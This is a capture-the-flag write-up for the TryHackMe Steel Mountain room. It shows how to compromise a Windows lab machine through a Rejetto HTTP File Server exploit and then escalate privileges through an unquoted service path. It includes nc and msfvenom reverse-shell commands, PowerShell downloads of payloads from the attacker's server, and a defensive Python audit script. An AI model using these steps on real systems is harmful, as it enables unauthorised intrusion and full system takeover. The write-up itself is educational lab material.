THM - Steel Mountain
Windows | Rejetto HTTP File Server | Unquoted Service Paths
Tools For This Room
PowerUp.ps1 - script to find privilege escalation methods on Windows - Download it from github: https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
Unquoted Service Paths - a vulnerability whereby a service's executable path contains spaces and isn't enclosed within quotes - more information here: https://pentestlab.blog/2017/03/09/unquoted-service-path/
TL;DR / Executive Summary
Scan and enumerate with nmap
Gain foothold by exploiting Rejetto HTTP File Server
Privesc by exploiting Unquoted Service Path
Scanning & Enumeration
Let's kick off with an nmap scan
Nmap
nmap -sV -sC -vv <IP>
We get plenty of open ports:
80: HTTP
135: RPC
139: SMB
445: SMB
3389: RDP
8080: HTTP

We check out port 80, which gives us the answer to the first question. All we have to do is view the page source to get this outstanding individual's name: Bill Harper.


Now let's move on to port 8080. We get the home page of HttpFileServer 2.3.

A quick Google search for related exploits yields a python script which only requires the victim IP and port. Fortunately, we have both ingredients. Alternatively, we could also have used searchsploit to find this via terminal.

Gaining Foothold
We need to do 3 things to successfully run this exploit. First, we need to edit the exploit with our IP and selected port. Next, we need to start a Python web server that will host the nc.exe file to be transferred to the victim machine. Lastly, we need to set up a netcat listener to catch the reverse shell.
We can copy nc.exe to a selected directory, and start the python server.
cp /usr/share/windows-resources/binaries/nc.exe nc.exe
python -m SimpleHTTPServer 80
Now set up the netcat listener.
nc -lvnp <port>
We'll need to run the exploit twice. The first time will get the victim machine to transfer nc.exe over from our machine. The second time will trigger it and get a reverse shell.
python 39161.py <victimIP> 8080
And we're rewarded with a reverse shell.

Let's grab the user.txt:

Privilege Escalation
We can use scripts such as winPEAS.exe or PowerUp.ps1 to find a way to privesc. In this case, we'll go with PowerUp.ps1.
Since we already have a Python web server running, we can use PowerShell's wget alias (Invoke-WebRequest) to transfer PowerUp over.
powershell -c wget "http://<ourIP>:<port>/PowerUp.ps1" -outfile "PowerUp.ps1"
Now to execute it.
powershell -ep bypass ./PowerUp.ps1
Looking through the results, we find a service called AdvancedSystemCareService9 with an unquoted service path.
We notice that its path is "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe" and that we have the necessary permissions to interact with the service. Because the path is unquoted and contains a space between Advanced and SystemCare, Windows will try "Advanced.exe" in that directory before it reaches ASCService.exe. If we navigate to that directory and place a malicious file called Advanced.exe, it will be executed with SYSTEM privileges when the service starts.
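As an added example (not part of the original writeup), the following Python audit check generalizes the mechanism above: given service PathName values (the IObit entry mirrors the room, the other entries are constructed), it flags unquoted paths containing spaces and lists, in order, the prefix paths the service control manager would try before the real image. Those are the locations a defender needs to confirm are not writable by unprivileged users.

```python
import re
from typing import Dict, List

# Constructed sample of service PathName values, as reported by `sc qc` or
# Win32_Service. Only the IObit entry mirrors the room; the rest are made up.
SAMPLE_SERVICES = {
    "AdvancedSystemCareService9":
        r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor Name\svc.exe" -k netsvcs',
    "SvcHostLike": r"C:\Windows\system32\svchost.exe -k LocalService",
    "HypotheticalSvc": r"C:\Some Dir\Sub Dir\app.exe /arg",
}

# Image path ends at the first ".exe"; anything after whitespace is arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)

def image_path(path_name: str) -> str:
    """Return the executable portion of a PathName with arguments stripped."""
    m = _EXE_RE.match(path_name.strip())
    return m.group(1) if m else path_name.strip()

def is_unquoted_with_spaces(path_name: str) -> bool:
    """True when PathName is not quoted and its image path contains a space."""
    if path_name.strip().startswith('"'):
        return False
    return " " in image_path(path_name)

def candidate_paths(path_name: str) -> List[str]:
    """Paths the service control manager tries in order for an unquoted path:
    each space-delimited prefix with .exe appended, then the real image.
    A defender must make sure none of these directories is writable by
    unprivileged users."""
    exe = image_path(path_name)
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    candidates.append(exe)
    return candidates

def audit(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each vulnerable service name to the paths that need checking."""
    return {name: candidate_paths(p) for name, p in services.items()
            if is_unquoted_with_spaces(p)}

if __name__ == "__main__":
    for name, paths in audit(SAMPLE_SERVICES).items():
        print(name, *paths, sep="\n    ")
```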

Let's generate the malicious file with msfvenom on our attacking machine. Ensure the file is placed in the directory served by the Python web server started earlier.
msfvenom -p windows/shell_reverse_tcp LHOST=<ourIP> LPORT=<port> -f exe -o Advanced.exe
Let's also set up a netcat listener to catch the reverse shell later.
nc -lvnp <port>
On the victim machine, let's navigate to the necessary directory.
cd C:\Program Files (x86)\IObit\Advanced SystemCare
Now let's transfer over the malicious file:
powershell -c wget "http://<ourIP>:80/Advanced.exe" -outfile "Advanced.exe"
We'll need to stop and restart the service to trigger it.
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9
Checking our listener, we get a reverse shell!

Let's grab the root flag.
